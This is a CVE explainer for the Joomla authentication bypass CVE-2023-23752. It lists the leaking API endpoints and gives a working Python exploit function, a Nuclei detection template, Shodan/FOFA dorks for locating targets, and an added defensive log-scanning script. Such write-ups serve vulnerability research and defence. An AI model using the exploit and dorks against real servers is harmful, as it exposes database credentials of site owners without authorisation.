# CVE Explained: CVE-2023-23752

* References:

  * Read: [vulncheck](https://vulncheck.com/blog/joomla-for-rce) and [Pingsafe](https://www.pingsafe.com/blog/cve-2023-23752-joomla-authentication-bypass-vulnerability/)
  * Exploit: [Ruby](https://github.com/Acceis/exploit-CVE-2023-23752) and [Python](https://github.com/Anekant-Singhai/Exploits/blob/master/CVE-2023-23752/CVE-2023-23752.py)
  * Video with Nuclei template: [Here](https://www.youtube.com/watch?v=8KUSPNpoozg)

## Exploitation (POC)

CVE-2023-23752 is an authentication bypass that results in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The bypass is triggered by requesting the Joomla! root URL of the affected server with one of the following endpoints appended:

```
{root-url}/api/index.php/v1/config/application?public=true
```

and:

```
{root-url}/api/index.php/v1/users?public=true
```
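As an added defensive example (not part of the original write-up or the linked exploit repositories), the following Python script parses web-server access logs in the Apache/Nginx combined format and flags GET requests to the two endpoints above that carry `public=true`, counting attempts and HTTP 200 responses (likely successful leaks) per source IP. The log lines, the regex and the function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints exposed by the CVE-2023-23752 authentication bypass (from the write-up above).
VULNERABLE_PATHS = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
)

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
# Constructed regex; adjust if your server uses a different log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_bypass_attempt(target):
    """True if the request path is one of the leaking endpoints and the query has public=true."""
    parts = urlsplit(target)
    path = parts.path.rstrip("/")
    if not any(path.endswith(p) for p in VULNERABLE_PATHS):
        return False
    values = [v.lower() for v in parse_qs(parts.query).get("public", [])]
    return "true" in values


def scan_log(lines):
    """Return (ip, target, status) for every GET that matches the bypass pattern."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and is_bypass_attempt(rec["target"]):
            hits.append((rec["ip"], rec["target"], rec["status"]))
    return hits


def summarize(hits):
    """Count attempts per source IP, and separately those that got HTTP 200 (likely leaks)."""
    attempts = Counter(ip for ip, _, _ in hits)
    leaks = Counter(ip for ip, _, status in hits if status == 200)
    return attempts, leaks


# Constructed sample log lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2023:12:00:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1843',
    '203.0.113.5 - - [10/Mar/2023:12:00:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 921',
    '198.51.100.7 - - [10/Mar/2023:12:01:10 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 12',
    '192.0.2.9 - - [10/Mar/2023:12:02:00 +0000] "GET /index.php/component/users/?view=login HTTP/1.1" 200 5120',
    '192.0.2.9 - - [10/Mar/2023:12:02:05 +0000] "GET /api/index.php/v1/users HTTP/1.1" 401 77',
]

if __name__ == "__main__":
    attempts, leaks = summarize(scan_log(SAMPLE_LOG))
    for ip, count in attempts.items():
        print(f"{ip}: {count} attempt(s), {leaks.get(ip, 0)} returned HTTP 200")
```

On a real server, feed `scan_log` the lines of the access log. A 200 response to the config endpoint means the database credentials in `configuration.php` should be treated as exposed and rotated after patching; a 401/403 indicates the request was blocked and is only a scanning signal.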


## Exploit Development

The exploit sends a request to each of these endpoints and returns the response body.

```python
import requests

def send_request(url):
    # url is the Joomla! root URL, e.g. "http://target/" (trailing slash optional)
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0'}
        base = url.rstrip('/')
        # Try the config endpoint first; it leaks the database credentials.
        # Do not call raise_for_status() before the 404 check, or the fallback never runs.
        response1 = requests.get(base + "/api/index.php/v1/config/application?public=true", headers=headers)
        if response1.status_code == 404:
            # Fall back to the users endpoint
            response2 = requests.get(base + '/api/index.php/v1/users?public=true', headers=headers)
            response2.raise_for_status()
            return response2.text
        else:
            response1.raise_for_status()  # Raise an HTTPError for other bad responses
            return response1.text
    except requests.RequestException as e:
        print(f"Error in sending request: {e}")
        return None
```

The whole exploit: [Anekant](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2023-23752)

```yaml
id: CVE-2023-23752

info:
  name: CVE-2023-23752-joomla
  author: badboycxcc
  severity: info
  description: description
  reference:
    - https://cve.report/CVE-2023-23752
  tags: CVE-2023-23752

requests:
  - raw:
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password"
          
      - type: word
        part: body
        words:
          - "attributes"

      - type: status
        status:
          - 200
```

The template is taken from [this](https://github.com/projectdiscovery/nuclei-templates/issues/6762) nuclei-templates GitHub issue, submitted by [badboycxcc](https://github.com/badboycxcc).

## Dorks

FOFA

```
app="Joomla-4"
```

SHODAN

```
product="Joomla-4"
```

